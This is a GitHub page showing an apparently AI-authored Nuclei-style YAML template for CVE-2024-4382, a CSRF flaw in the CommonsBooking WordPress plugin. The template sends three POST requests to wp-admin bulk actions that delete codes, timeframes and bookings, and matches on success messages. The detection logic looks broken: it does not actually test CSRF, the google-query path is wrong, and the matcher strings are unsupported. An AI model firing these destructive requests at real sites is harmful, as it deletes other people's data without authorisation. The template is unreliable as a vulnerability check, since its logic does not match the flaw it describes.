-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2024-4382.yaml
67 lines (57 loc) · 2.12 KB
/
CVE-2024-4382.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
id: CVE-2024-4382
info:
name: CSRF Vulnerability in CB WordPress Plugin
author: ProjectDiscoveryAI
severity: medium
description: The CB (legacy) WordPress plugin through 0.9.4.18 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings.
impact: |
Allows attackers to perform unauthorized actions on behalf of authenticated users
remediation: |
Update CB WordPress Plugin to the latest version to mitigate CVE-2024-4382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2024-4382
cwe-id: CWE-352
epss-score: 0.00048
epss-percentile: 0.19387
cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:*
metadata:
vendor: wielebenwir
product: commonsbooking
framework: wordpress
google-query: inurl:/wp-content/plugin/commonsbooking/
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php?page=cb_codes"
body: "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_codes&action=delete&filterby-Items=&paged=1&id%5B%5D=1&action2=delete"
headers:
Content-Type: "application/x-www-form-urlencoded"
matchers:
- type: word
words:
- "Item deleted successfully"
part: body
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php?page=cb_timeframes"
body: "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_timeframes&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete"
headers:
Content-Type: "application/x-www-form-urlencoded"
matchers:
- type: word
words:
- "Timeframe removed"
part: body
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php?page=cb_bookings"
body: "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_bookings&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete"
headers:
Content-Type: "application/x-www-form-urlencoded"
matchers:
- type: word
words:
- "Booking deleted"
part: body